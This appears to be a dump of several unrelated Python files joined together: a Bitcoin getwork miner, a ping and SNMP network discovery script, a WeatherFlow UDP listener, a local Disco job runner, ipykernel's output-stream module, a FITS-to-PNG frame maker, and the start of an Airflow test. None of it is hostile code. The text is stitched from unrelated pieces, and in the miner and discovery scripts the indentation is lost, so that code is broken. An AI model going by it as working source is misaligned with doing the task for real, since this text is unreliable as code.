print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 7776
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
discover.py
|
#!/usr/bin/env python
from processing import Process, Queue, Pool
import time
import subprocess
from IPy import IP
import sys
from snmp import Snmp
q = Queue()
oq = Queue()
#ips = IP("10.0.1.0/24")
ips = ["192.19.101.250", "192.19.101.251", "192.19.101.252","192.19.101.253",
"192.168.1.1"]
num_workers = 10
class HostRecord(object):
"""Record for Hosts"""
def __init__(self, ip=None, mac=None, snmp_response=None):
self.ip = ip
self.mac = mac
self.snmp_response = snmp_response
def __repr__(self):
return "[Host Record('%s','%s','%s')]" % (self.ip,
self.mac,
self.snmp_response)
def f(i,q,oq):
while True:
time.sleep(.1)
        if q.empty():
            print "Process Number: %s Exit" % i
            sys.exit()
ip = q.get()
print "Process Number: %s" % i
ret = subprocess.call("ping -c 1 %s" % ip,
shell=True,
stdout=open('/dev/null', 'w'),
stderr=subprocess.STDOUT)
if ret == 0:
print "%s: is alive" % ip
oq.put(ip)
else:
print "Process Number: %s didn't find a response for %s " % (i, ip)
pass
def snmp_query(i,out):
while True:
time.sleep(.1)
if out.empty():
sys.exit()
print "Process Number: %s" % i
ipaddr = out.get()
s = Snmp()
h = HostRecord()
h.ip = ipaddr
h.snmp_response = s.query()
print h
return h
try:
q.putmany(ips)
finally:
for i in range(num_workers):
p = Process(target=f, args=[i,q,oq])
p.start()
for i in range(num_workers):
pp = Process(target=snmp_query, args=[i,oq])
pp.start()
print "main process joins on queue"
p.join()
#while not oq.empty():
# print "Validated", oq.get()
print "Main Program finished"
|
udp.py
|
from socket import *
import threading, time, json
from .data import add_data_keys
# Valid data types, documented for the API and so the calling application can check against them if needed
VALID_DATA_TYPES = ('evt_precip', 'evt_strike', 'rapid_wind', 'obs_air', 'obs_sky', 'obs_st', 'device_status',
'hub_status')
# Define UDP API parameters
_UDP_VERSION = 143
_UDP_PORT = 50222
class Udp:
_thread_name = 'weatherflow-udp-listener'
def __init__(self, bind_address='', debug=False):
"""
This class utilizes the local UDP broadcast data from the WeatherFlow hub which must exist on the same network
:param bind_address: IP address of interface to listen on (default is all)
:param debug: Enable debugging for low-level troubleshooting
"""
self.debug = debug
if debug:
print("Constructing UDP class")
self.sock = None
self.start(bind_address)
def start(self, bind_address='', udp_port=_UDP_PORT):
"""
Opens the network socket and starts the listening thread, called automatically during construction
:param bind_address: IP address of interface to listen on (default is all)
:param udp_port: UDP port to listen on
:return: Nothing
"""
# Make sure someone does not try to start the listener twice
if self.sock:
if self.debug:
print("Udp class has already been told to start listening")
else:
# Open socket
try:
if self.debug:
print("Opening UDP listener socket")
self.sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)
self.sock.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock.setblocking(True)
self.sock.bind((bind_address, udp_port))
if self.debug:
print("UDP listener socket opened")
except:
raise UdpError("Issue listening on socket for UDP broadcast traffic")
# Latest data will be dict of object types containing dict with keys data, timestamp, fetched
self.latest_data = {}
# Start listening
self.run_thread = True
self.thread_exception = None
self.listen_thread = threading.Thread(target=self._listen, name=self._thread_name, daemon=True)
if self.debug:
print("Starting thread %s" % self._thread_name)
self.listen_thread.start()
def __del__(self):
"""
We try to call stop automatically, but the calling code should always do this for proper cleanup
:return:
"""
self.stop()
def stop(self):
"""
Triggers the listening thread to stop and closes the socket
:return:
"""
if self.debug:
print("Triggering %s thread to stop running" % self._thread_name)
self.run_thread = False
# Block until the listening thread has stopped running
while self.listen_thread.is_alive():
if self.debug:
print("Waiting for %s thread to shutdown" % self._thread_name)
time.sleep(.1)
# If socket not closed yet then close it
if self.sock:
if self.debug:
print("Closing listening socket")
self.sock.shutdown(SHUT_RDWR)
self.sock.close()
self.sock = None
def _listen(self):
"""
Method used for creating new thread to listen for incoming data on open socket
:return:
"""
if self.debug:
print("Listener thread %s started" % self._thread_name)
while self.run_thread:
if self.debug:
print("(%s) Listening for data..." % self._thread_name)
# Get data and send back to parent object so we can retrieve when we need
try:
data, host_info = self.sock.recvfrom(1024)
except:
self.thread_exception = UdpError("(%s) Issue receiving data from socket" % self._thread_name)
raise self.thread_exception
# Convert received data from bytes to string
raw_data = data.decode()
if self.debug:
print("(%s) Received: %s" % (self._thread_name, raw_data))
# Store data as structure for its object type
try:
data = json.loads(raw_data)
except:
raise UdpParseError('Issue parsing JSON received from WeatherFlow bridge UDP stream')
if data and 'type' in data:
data_type = data['type']
self.latest_data[data_type] = {'data': data, 'timestamp': time.time(), 'fetched': False}
self.latest_data['most_recent'] = data_type
else:
raise UdpParseError('UDP data received from WeatherFlow bridge has no field type')
if self.debug:
print("Listener thread stopped")
def new_data_available(self, data_type='most_recent'):
"""
Is new data available?
        :param data_type: The object type to check for new data (defaults to the most recently received type)
:return: True if yes, false if no
"""
# Has listener thread thrown an exception? If so we need to pass onto main program.
if self.thread_exception:
raise self.thread_exception
# If we want most recent data switch data type to what was most recent
if data_type == 'most_recent' and data_type in self.latest_data:
data_type = self.latest_data[data_type]
        # Return True if the data has not been fetched yet; if we have no data at all, return False
if data_type in self.latest_data:
return not self.latest_data[data_type]['fetched']
else:
return False
def get_latest_data(self, data_type='most_recent', auto_add_data_keys=True):
"""
Return latest data as regular Python structured and record that latest data has been fetched
        :param data_type: The object type to fetch data for (defaults to the most recently received type)
:param auto_add_data_keys: If true, data arrays will be converted from integer arrays to dictionaries
:return: Latest data as Python structure (or None if there is no data yet)
"""
# If we want most recent data switch data type to what was most recent
if data_type == 'most_recent' and data_type in self.latest_data:
data_type = self.latest_data[data_type]
        # Return the data; if we have no data at all, return None
if data_type in self.latest_data:
self.latest_data[data_type]['fetched'] = True
if auto_add_data_keys:
return add_data_keys(self.latest_data[data_type]['data'], 'udp')
else:
return self.latest_data[data_type]['data']
else:
return None
class UdpError(Exception):
pass
class UdpParseError(Exception):
pass
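# --- Hedged usage sketch (illustrative only) ----------------------------------
# Poll the listener for the most recent observation for roughly five seconds,
# then shut it down. The polling window and the bare print() are assumptions
# made for this example; run it in a package context (e.g. ``python -m``) so
# the relative import above resolves.
if __name__ == '__main__':
    listener = Udp(debug=False)
    try:
        for _ in range(50):
            if listener.new_data_available():
                print(listener.get_latest_data())
            time.sleep(0.1)
    finally:
        listener.stop()  # stops the listener thread and closes the socket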
|
disco.py
|
from __future__ import absolute_import
import json
import os
from StringIO import StringIO
from urlparse import urlparse, parse_qs
import threading
import re
from functools import partial
import hashlib
from datetime import datetime
import time
import disco
from disco.core import Disco
from .io import puts
from . import event_loop
from . import job_control
from . import server
disco_url_regex = re.compile(".*?://.*?/disco/(.*)")
preferred_host_re = re.compile("^[a-zA-Z0-9]+://([^/:]*)")
def run_script(script, data_root):
loop = start_event_loop()
job_control.set_event_loop(loop)
try:
patch_disco()
host,port = server.start(loop)
os.environ['DISCO_HOME'] = disco.__path__[0]
os.environ['DISCO_DATA'] = data_root
os.environ['DISCO_PORT'] = str(port)
os.environ['DDFS_PUT_PORT'] = str(port)
globals_ = {
"__name__" : "__main__",
"__file__" : script,
"__builtins__" : __builtins__
}
locals_ = globals_
exec(compile(open(script).read(), script, 'exec'), globals_, locals_)
finally:
loop.stop()
def start_event_loop():
event = threading.Event()
ret = []
def _():
ev = event_loop.current_event_loop()
ret.append(ev)
# wake up our parent thread
event.set()
ev.run()
threading.Thread(target=_).start()
event.wait()
return ret[0]
def patch_disco():
Disco._wait = Disco.wait
Disco.wait = wait
Disco.submit = submit
Disco.request = request
def submit(self, jobpack):
return job_control.new(jobpack).name
def request(self, url, data=None, offset=0):
#puts(url)
url = urlparse(url)
# unwrap query
args = dict([ (k,v[0]) for k,v in parse_qs(url.query).items()])
path = url.path
if path == '/disco/ctrl/jobinfo':
return jobinfo(**args)
elif path == '/disco/ctrl/rawevents':
return rawevents(**args)[offset:]
elif path == '/disco/ctrl/get_results':
return get_results()
else:
raise RuntimeError("Unexpected url {}".format(url))
def wait(self, jobname, poll_interval=.01, timeout=None, clean=False, show=None):
# We're local so reduce lag by polling faster...
return self._wait(jobname, poll_interval, timeout, clean, show)
def jobinfo(name):
job = job_control.get(name)
return json.dumps(job.info())
def rawevents(name):
events = [
["2013/03/20 12:45:20","master","New job initialized!"]
]
return "\n".join([ json.dumps(e) for e in events ])
def get_results():
jobs = job_control.jobs.values()
return json.dumps([
(job.name, [job.status, job.results]) for job in jobs
])
def disco_url_path(url):
return disco_url_regex.match(url).group(1)
def job_home(job_name, root):
return os.path.join(root, hex_hash(job_name), job_name)
def job_url(host, job_name):
return os.path.join("disco", host, hex_hash(job_name), job_name)
def hex_hash(path):
"""
Return the first 2 hex digits of the md5 of the given path.
Suitable for creating sub dirs to break up a large directory
"""
return hashlib.md5(path).hexdigest()[:2]
def preferred_host(url):
m = preferred_host_re.search(url)
if m:
return m.group(1)
def timestamp(dt=None):
"""
    Return a timestamp in the format of hex(megaseconds)-hex(seconds)-hex(microseconds)
The timestamp should be monotonically increasing and hence usable as a uuid
"""
if dt is None:
dt = datetime.utcnow()
mega, seconds = map(int, divmod(time.mktime(dt.timetuple()), 10**6))
return "{:x}-{:x}-{:x}".format(mega, seconds, dt.microsecond)
|
iostream.py
|
"""Wrappers for forwarding stdout/stderr over zmq"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import atexit
import io
import os
import sys
import threading
import traceback
import warnings
from binascii import b2a_hex
from collections import deque
from io import StringIO, TextIOBase
from typing import Any, Callable, Deque, Optional
from weakref import WeakSet
import zmq
from jupyter_client.session import extract_header
from tornado.ioloop import IOLoop
from zmq.eventloop.zmqstream import ZMQStream
# -----------------------------------------------------------------------------
# Globals
# -----------------------------------------------------------------------------
MASTER = 0
CHILD = 1
# -----------------------------------------------------------------------------
# IO classes
# -----------------------------------------------------------------------------
class IOPubThread:
"""An object for sending IOPub messages in a background thread
Prevents a blocking main thread from delaying output from threads.
IOPubThread(pub_socket).background_socket is a Socket-API-providing object
whose IO is always run in a thread.
"""
def __init__(self, socket, pipe=False):
"""Create IOPub thread
Parameters
----------
socket : zmq.PUB Socket
the socket on which messages will be sent.
pipe : bool
Whether this process should listen for IOPub messages
piped from subprocesses.
"""
self.socket = socket
self.background_socket = BackgroundSocket(self)
self._master_pid = os.getpid()
self._pipe_flag = pipe
self.io_loop = IOLoop(make_current=False)
if pipe:
self._setup_pipe_in()
self._local = threading.local()
self._events: Deque[Callable[..., Any]] = deque()
self._event_pipes: WeakSet[Any] = WeakSet()
self._setup_event_pipe()
self.thread = threading.Thread(target=self._thread_main, name="IOPub")
self.thread.daemon = True
self.thread.pydev_do_not_trace = True # type:ignore[attr-defined]
self.thread.is_pydev_daemon_thread = True # type:ignore[attr-defined]
self.thread.name = "IOPub"
def _thread_main(self):
"""The inner loop that's actually run in a thread"""
self.io_loop.start()
self.io_loop.close(all_fds=True)
def _setup_event_pipe(self):
"""Create the PULL socket listening for events that should fire in this thread."""
ctx = self.socket.context
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
_uuid = b2a_hex(os.urandom(16)).decode("ascii")
iface = self._event_interface = "inproc://%s" % _uuid
pipe_in.bind(iface)
self._event_puller = ZMQStream(pipe_in, self.io_loop)
self._event_puller.on_recv(self._handle_event)
@property
def _event_pipe(self):
"""thread-local event pipe for signaling events that should be processed in the thread"""
try:
event_pipe = self._local.event_pipe
except AttributeError:
# new thread, new event pipe
ctx = self.socket.context
event_pipe = ctx.socket(zmq.PUSH)
event_pipe.linger = 0
event_pipe.connect(self._event_interface)
self._local.event_pipe = event_pipe
# WeakSet so that event pipes will be closed by garbage collection
# when their threads are terminated
self._event_pipes.add(event_pipe)
return event_pipe
def _handle_event(self, msg):
"""Handle an event on the event pipe
Content of the message is ignored.
Whenever *an* event arrives on the event stream,
*all* waiting events are processed in order.
"""
# freeze event count so new writes don't extend the queue
# while we are processing
n_events = len(self._events)
for _ in range(n_events):
event_f = self._events.popleft()
event_f()
def _setup_pipe_in(self):
"""setup listening pipe for IOPub from forked subprocesses"""
ctx = self.socket.context
# use UUID to authenticate pipe messages
self._pipe_uuid = os.urandom(16)
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
try:
self._pipe_port = pipe_in.bind_to_random_port("tcp://127.0.0.1")
except zmq.ZMQError as e:
warnings.warn(
"Couldn't bind IOPub Pipe to 127.0.0.1: %s" % e
+ "\nsubprocess output will be unavailable."
)
self._pipe_flag = False
pipe_in.close()
return
self._pipe_in = ZMQStream(pipe_in, self.io_loop)
self._pipe_in.on_recv(self._handle_pipe_msg)
def _handle_pipe_msg(self, msg):
"""handle a pipe message from a subprocess"""
if not self._pipe_flag or not self._is_master_process():
return
if msg[0] != self._pipe_uuid:
print("Bad pipe message: %s", msg, file=sys.__stderr__)
return
self.send_multipart(msg[1:])
def _setup_pipe_out(self):
# must be new context after fork
ctx = zmq.Context()
pipe_out = ctx.socket(zmq.PUSH)
pipe_out.linger = 3000 # 3s timeout for pipe_out sends before discarding the message
pipe_out.connect("tcp://127.0.0.1:%i" % self._pipe_port)
return ctx, pipe_out
def _is_master_process(self):
return os.getpid() == self._master_pid
def _check_mp_mode(self):
"""check for forks, and switch to zmq pipeline if necessary"""
if not self._pipe_flag or self._is_master_process():
return MASTER
else:
return CHILD
def start(self):
"""Start the IOPub thread"""
self.thread.name = "IOPub"
self.thread.start()
# make sure we don't prevent process exit
# I'm not sure why setting daemon=True above isn't enough, but it doesn't appear to be.
atexit.register(self.stop)
def stop(self):
"""Stop the IOPub thread"""
if not self.thread.is_alive():
return
self.io_loop.add_callback(self.io_loop.stop)
self.thread.join()
# close *all* event pipes, created in any thread
# event pipes can only be used from other threads while self.thread.is_alive()
# so after thread.join, this should be safe
for event_pipe in self._event_pipes:
event_pipe.close()
def close(self):
if self.closed:
return
self.socket.close()
self.socket = None
@property
def closed(self):
return self.socket is None
def schedule(self, f):
"""Schedule a function to be called in our IO thread.
If the thread is not running, call immediately.
"""
if self.thread.is_alive():
self._events.append(f)
# wake event thread (message content is ignored)
self._event_pipe.send(b"")
else:
f()
def send_multipart(self, *args, **kwargs):
"""send_multipart schedules actual zmq send in my thread.
If my thread isn't running (e.g. forked process), send immediately.
"""
self.schedule(lambda: self._really_send(*args, **kwargs))
def _really_send(self, msg, *args, **kwargs):
"""The callback that actually sends messages"""
if self.closed:
return
mp_mode = self._check_mp_mode()
if mp_mode != CHILD:
# we are master, do a regular send
self.socket.send_multipart(msg, *args, **kwargs)
else:
# we are a child, pipe to master
# new context/socket for every pipe-out
# since forks don't teardown politely, use ctx.term to ensure send has completed
ctx, pipe_out = self._setup_pipe_out()
pipe_out.send_multipart([self._pipe_uuid] + msg, *args, **kwargs)
pipe_out.close()
ctx.term()
class BackgroundSocket:
"""Wrapper around IOPub thread that provides zmq send[_multipart]"""
io_thread = None
def __init__(self, io_thread):
self.io_thread = io_thread
def __getattr__(self, attr):
"""Wrap socket attr access for backward-compatibility"""
if attr.startswith("__") and attr.endswith("__"):
# don't wrap magic methods
super().__getattr__(attr) # type:ignore[misc]
assert self.io_thread is not None
if hasattr(self.io_thread.socket, attr):
warnings.warn(
f"Accessing zmq Socket attribute {attr} on BackgroundSocket"
f" is deprecated since ipykernel 4.3.0"
f" use .io_thread.socket.{attr}",
DeprecationWarning,
stacklevel=2,
)
return getattr(self.io_thread.socket, attr)
super().__getattr__(attr) # type:ignore[misc]
def __setattr__(self, attr, value):
if attr == "io_thread" or (attr.startswith("__" and attr.endswith("__"))):
super().__setattr__(attr, value)
else:
warnings.warn(
f"Setting zmq Socket attribute {attr} on BackgroundSocket"
f" is deprecated since ipykernel 4.3.0"
f" use .io_thread.socket.{attr}",
DeprecationWarning,
stacklevel=2,
)
assert self.io_thread is not None
setattr(self.io_thread.socket, attr, value)
def send(self, msg, *args, **kwargs):
return self.send_multipart([msg], *args, **kwargs)
def send_multipart(self, *args, **kwargs):
"""Schedule send in IO thread"""
assert self.io_thread is not None
return self.io_thread.send_multipart(*args, **kwargs)
class OutStream(TextIOBase):
"""A file like object that publishes the stream to a 0MQ PUB socket.
Output is handed off to an IO Thread
"""
# timeout for flush to avoid infinite hang
# in case of misbehavior
flush_timeout = 10
# The time interval between automatic flushes, in seconds.
flush_interval = 0.2
topic = None
encoding = "UTF-8"
_exc: Optional[Any] = None
def fileno(self):
"""
        Things like subprocess will peek and write to the fileno() of stderr/stdout.
"""
if getattr(self, "_original_stdstream_copy", None) is not None:
return self._original_stdstream_copy
else:
raise io.UnsupportedOperation("fileno")
def _watch_pipe_fd(self):
"""
        We've redirected standard streams 0 and 1 into a pipe.
We need to watch in a thread and redirect them to the right places.
1) the ZMQ channels to show in notebook interfaces,
2) the original stdout/err, to capture errors in terminals.
We cannot schedule this on the ioloop thread, as this might be blocking.
"""
try:
bts = os.read(self._fid, 1000)
while bts and self._should_watch:
self.write(bts.decode())
os.write(self._original_stdstream_copy, bts)
bts = os.read(self._fid, 1000)
except Exception:
self._exc = sys.exc_info()
def __init__(
self,
session,
pub_thread,
name,
pipe=None,
echo=None,
*,
watchfd=True,
isatty=False,
):
"""
Parameters
----------
name : str {'stderr', 'stdout'}
the name of the standard stream to replace
watchfd : bool (default, True)
            Watch the file descriptor corresponding to the replaced stream.
            This is useful if you know some underlying code will write directly
            to the file descriptor by its number. It will spawn a watching thread
            that will swap the given file descriptor for a pipe, read from the
            pipe, and insert this into the current stream.
isatty : bool (default, False)
            Indication of whether this stream has terminal capabilities (e.g. can handle colors)
"""
if pipe is not None:
warnings.warn(
"pipe argument to OutStream is deprecated and ignored since ipykernel 4.2.3.",
DeprecationWarning,
stacklevel=2,
)
# This is necessary for compatibility with Python built-in streams
self.session = session
if not isinstance(pub_thread, IOPubThread):
# Backward-compat: given socket, not thread. Wrap in a thread.
warnings.warn(
"Since IPykernel 4.3, OutStream should be created with "
"IOPubThread, not %r" % pub_thread,
DeprecationWarning,
stacklevel=2,
)
pub_thread = IOPubThread(pub_thread)
pub_thread.start()
self.pub_thread = pub_thread
self.name = name
self.topic = b"stream." + name.encode()
self.parent_header = {}
self._master_pid = os.getpid()
self._flush_pending = False
self._subprocess_flush_pending = False
self._io_loop = pub_thread.io_loop
self._buffer_lock = threading.RLock()
self._buffer = StringIO()
self.echo = None
self._isatty = bool(isatty)
if (
watchfd
and (sys.platform.startswith("linux") or sys.platform.startswith("darwin"))
and ("PYTEST_CURRENT_TEST" not in os.environ)
):
            # Pytest sets up its own capture. Don't redirect from within pytest.
self._should_watch = True
self._setup_stream_redirects(name)
if echo:
if hasattr(echo, "read") and hasattr(echo, "write"):
self.echo = echo
else:
raise ValueError("echo argument must be a file like object")
def isatty(self):
"""Return a bool indicating whether this is an 'interactive' stream.
Returns:
Boolean
"""
return self._isatty
def _setup_stream_redirects(self, name):
pr, pw = os.pipe()
fno = getattr(sys, name).fileno()
self._original_stdstream_copy = os.dup(fno)
os.dup2(pw, fno)
self._fid = pr
self._exc = None
self.watch_fd_thread = threading.Thread(target=self._watch_pipe_fd)
self.watch_fd_thread.daemon = True
self.watch_fd_thread.start()
def _is_master_process(self):
return os.getpid() == self._master_pid
def set_parent(self, parent):
self.parent_header = extract_header(parent)
def close(self):
if sys.platform.startswith("linux") or sys.platform.startswith("darwin"):
self._should_watch = False
self.watch_fd_thread.join()
if self._exc:
etype, value, tb = self._exc
traceback.print_exception(etype, value, tb)
self.pub_thread = None
@property
def closed(self):
return self.pub_thread is None
def _schedule_flush(self):
"""schedule a flush in the IO thread
call this on write, to indicate that flush should be called soon.
"""
if self._flush_pending:
return
self._flush_pending = True
# add_timeout has to be handed to the io thread via event pipe
def _schedule_in_thread():
self._io_loop.call_later(self.flush_interval, self._flush)
self.pub_thread.schedule(_schedule_in_thread)
def flush(self):
"""trigger actual zmq send
send will happen in the background thread
"""
if (
self.pub_thread
and self.pub_thread.thread is not None
and self.pub_thread.thread.is_alive()
and self.pub_thread.thread.ident != threading.current_thread().ident
):
# request flush on the background thread
self.pub_thread.schedule(self._flush)
# wait for flush to actually get through, if we can.
evt = threading.Event()
self.pub_thread.schedule(evt.set)
# and give a timeout to avoid
if not evt.wait(self.flush_timeout):
# write directly to __stderr__ instead of warning because
# if this is happening sys.stderr may be the problem.
print("IOStream.flush timed out", file=sys.__stderr__)
else:
self._flush()
def _flush(self):
"""This is where the actual send happens.
_flush should generally be called in the IO thread,
unless the thread has been destroyed (e.g. forked subprocess).
"""
self._flush_pending = False
self._subprocess_flush_pending = False
if self.echo is not None:
try:
self.echo.flush()
except OSError as e:
if self.echo is not sys.__stderr__:
print(f"Flush failed: {e}", file=sys.__stderr__)
data = self._flush_buffer()
if data:
# FIXME: this disables Session's fork-safe check,
# since pub_thread is itself fork-safe.
# There should be a better way to do this.
self.session.pid = os.getpid()
content = {"name": self.name, "text": data}
self.session.send(
self.pub_thread,
"stream",
content=content,
parent=self.parent_header,
ident=self.topic,
)
def write(self, string: str) -> Optional[int]: # type:ignore[override]
"""Write to current stream after encoding if necessary
Returns
-------
len : int
number of items from input parameter written to stream.
"""
if not isinstance(string, str):
raise TypeError(f"write() argument must be str, not {type(string)}")
if self.echo is not None:
try:
self.echo.write(string)
except OSError as e:
if self.echo is not sys.__stderr__:
print(f"Write failed: {e}", file=sys.__stderr__)
if self.pub_thread is None:
raise ValueError("I/O operation on closed file")
else:
is_child = not self._is_master_process()
# only touch the buffer in the IO thread to avoid races
with self._buffer_lock:
self._buffer.write(string)
if is_child:
# mp.Pool cannot be trusted to flush promptly (or ever),
# and this helps.
if self._subprocess_flush_pending:
return None
self._subprocess_flush_pending = True
# We can not rely on self._io_loop.call_later from a subprocess
self.pub_thread.schedule(self._flush)
else:
self._schedule_flush()
return len(string)
def writelines(self, sequence):
if self.pub_thread is None:
raise ValueError("I/O operation on closed file")
else:
for string in sequence:
self.write(string)
def writable(self):
return True
def _flush_buffer(self):
"""clear the current buffer and return the current buffer data."""
buf = self._rotate_buffer()
data = buf.getvalue()
buf.close()
return data
def _rotate_buffer(self):
"""Returns the current buffer and replaces it with an empty buffer."""
with self._buffer_lock:
old_buffer = self._buffer
self._buffer = StringIO()
return old_buffer
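# --- Hedged usage sketch (not part of ipykernel) -------------------------------
# Wire an IOPubThread to a plain zmq PUB socket and schedule a callable on its
# IO thread. The inproc address and the demo function name are illustrative.
def _demo_iopub_thread():
    ctx = zmq.Context()
    pub = ctx.socket(zmq.PUB)
    pub.bind("inproc://iopub-demo")
    thread = IOPubThread(pub)
    thread.start()
    try:
        # Runs on the IOPub thread; schedule() falls back to a direct call if
        # the thread is not alive.
        thread.schedule(lambda: print("hello from the IOPub thread"))
    finally:
        thread.stop()          # joins the IO loop thread
        thread.close()         # closes the wrapped PUB socket
        ctx.destroy(linger=0)  # close any remaining sockets and terminate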
|
make_video_frames.py
|
#!/usr/bin/env python
# -*- coding: iso-8859-15 -*-
import sys
import subprocess, shlex
import os
import os.path
import string
import logging
import argparse
import threading
from glob import glob
# Parameters to transform fits to png
bin = 'fits2png.x'
def run_cmd(cmd):
logging.debug("About to execute: %s", ' '.join(cmd))
try:
process = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds = True)
stdout, stderr = process.communicate()
return_code = process.poll()
if return_code != 0:
logging.error("Failed running command %s : Return code : %d\t Stdout: %s\t StdErr: %s", ' '.join(cmd), return_code, stderr, stdout)
return False
    except Exception as why:
logging.error('Failed running command %s : %s', ' '.join(cmd), str(why))
return False
else:
if logging.root.isEnabledFor(logging.DEBUG):
logging.debug("Command %s : Return code : %d\t Stdout: %s\t StdErr: %s", ' '.join(cmd), return_code, stderr, stdout)
return True
def fits2images(fits_files, output_directory = '.', config_file = None, force = False):
# We make up the fits2png command
cmd = [bin, '-O', output_directory]
if config_file:
cmd.extend(['-C', config_file])
for fits_file in fits_files:
if not force:
fits_filename, trash = os.path.splitext(os.path.basename(fits_file))
image_filename = os.path.join(output_directory, fits_filename+ '.png')
if os.path.exists(image_filename):
continue
run_cmd(cmd + [fits_file])
def setup_logging(filename = None, quiet = False, verbose = False, debug = False):
global logging
if debug:
logging.basicConfig(level = logging.DEBUG, format='%(levelname)-8s: %(message)s')
elif verbose:
logging.basicConfig(level = logging.INFO, format='%(levelname)-8s: %(message)s')
else:
logging.basicConfig(level = logging.CRITICAL, format='%(levelname)-8s: %(message)s')
if quiet:
logging.root.handlers[0].setLevel(logging.CRITICAL + 10)
elif debug:
logging.root.handlers[0].setLevel(logging.DEBUG)
elif verbose:
logging.root.handlers[0].setLevel(logging.INFO)
else:
logging.root.handlers[0].setLevel(logging.CRITICAL)
if filename:
fh = logging.FileHandler(filename, delay=True)
fh.setFormatter(logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(funcName)-12s %(message)s', datefmt='%Y-%m-%d %H:%M:%S'))
if debug:
fh.setLevel(logging.DEBUG)
else:
fh.setLevel(logging.INFO)
logging.root.addHandler(fh)
# Start point of the script
if __name__ == "__main__":
script_name = os.path.splitext(os.path.basename(sys.argv[0]))[0]
# Get the arguments
parser = argparse.ArgumentParser(description='Make video frames from fits files.')
parser.add_argument('--debug', '-d', default=False, action='store_true', help='Set the logging level to debug')
parser.add_argument('--quiet', '-q', default=False, action='store_true', help='Do not display any error message.')
parser.add_argument('--output_directory', '-o', default='.', help='The directory in which the video frame will be created')
parser.add_argument('--config', '-c', help='A configuration file for fits2png')
parser.add_argument('--threads', '-t', default=1, type=int, help='The number of threads to use.')
parser.add_argument('--force', '-f', default=False, action='store_true', help='Overwrite video frame if it exists already')
parser.add_argument('fits_files', nargs='+', help='The paths of the fits files')
args = parser.parse_args()
# Setup the logging
setup_logging(quiet = args.quiet, verbose = True, debug = args.debug)
if not args.fits_files:
logging.error("You must specify at least one fits file")
sys.exit(2)
# We glob the fits_files
fits_files = list()
for fits_file in args.fits_files:
if os.path.exists(fits_file):
fits_files.append(fits_file)
else:
files = sorted(glob(fits_file))
if files:
fits_files.extend(files)
else:
logging.warning("File %s not found, skipping!", fits_file)
number_threads = max(1, args.threads)
start_pos = 0
delta_pos = int(len(fits_files) / number_threads)
while start_pos + delta_pos < len(fits_files):
logging.debug("Starting thread for fits files %d to %d", start_pos, start_pos + delta_pos)
thread = threading.Thread(group=None, name='fits2images', target=fits2images, args=(fits_files[start_pos:start_pos+delta_pos], args.output_directory, args.config, args.force))
thread.start()
start_pos += delta_pos
if start_pos < len(fits_files):
fits2images(fits_files[start_pos:], args.output_directory, args.config, args.force)
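# --- Hedged example invocation (paths, config and thread count are illustrative)
#
#   ./make_video_frames.py -o frames -c fits2png.config -t 4 'aia_*.fits'
#
# Each fits file (or glob) is converted to a PNG in the output directory; frames
# that already exist are skipped unless --force is given.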
|
test_local_task_job.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import multiprocessing
import time
import unittest
from airflow import AirflowException, models, settings
from airflow.configuration import conf
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs import LocalTaskJob
from airflow.models import DAG, TaskInstance as TI
from airflow.operators.dummy_operator import DummyOperator
from airflow.utils import timezone
from airflow.utils.db import create_session
from airflow.utils.net import get_hostname
